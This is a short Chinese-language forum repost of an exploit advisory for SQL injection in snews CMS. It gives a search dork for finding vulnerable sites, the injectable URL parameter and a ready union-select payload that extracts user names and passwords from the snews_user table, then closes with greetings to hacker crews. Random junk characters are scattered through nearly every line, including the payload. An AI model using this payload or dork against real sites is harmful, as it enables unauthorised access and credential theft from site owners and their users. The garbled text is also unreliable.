标题: CMS snews SQL Injection Vulnerability' K b5 N0 `" P/ g) T, v
作者: By onestree
2 w* I) x- q5 g/ E& Y/ S- j下载地址 : http://snewscms.com/0 n2 ~6 W6 I4 c& b: u) G1 b) p
测试平台 : ubuntu 12.10 / win 72 i5 t5 r- |# H4 D( D' N
关键词: inurl:"tanyakan pada rumput yang bergoyang"
0 A7 C# b' J; H
! ?! `. o6 V7 ?7 K& o ; M5 r( w& a2 g/ X# D8 R
*************************************************************
# Z9 G) }( P0 V7 ?: I
; l+ E; N5 S. }) m( BSQL poc:
- A0 t% X7 }8 N6 w& Y
8 x% Q0 @/ l5 W5 _4 d% yhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]1 D, q' x' s" A4 l
' `4 X9 c4 G% E1 y# n+ R0 K
示例9 w" z7 j# n+ l5 \/ z% j8 d! h
' c3 A- J2 V4 N5 W0 ~2 `9 Y, Yhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*4 a( ?& L& q, n. B% d+ ^% U
5 e# f4 M2 j4 \; L$ }
% z( m% O, V0 @" X. u# r致谢:
6 [2 M0 {! _# X0 o( g
$ Q/ }1 Z, l: s( L; M- _ z Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell5 W6 e' p: y; C, }+ b" M/ v
; H0 `% Y) w8 h7 u7 c indonesiancoder - moeslimh4x0r - go-coder& N- _9 B0 B {* Z% Q- `; c
, w* ~$ d9 ]. }, `4 [
spesial my hunny :*
9 L: b% u$ _* X6 H |
发表于 2013-1-23 08:55:06
收藏
支持
反对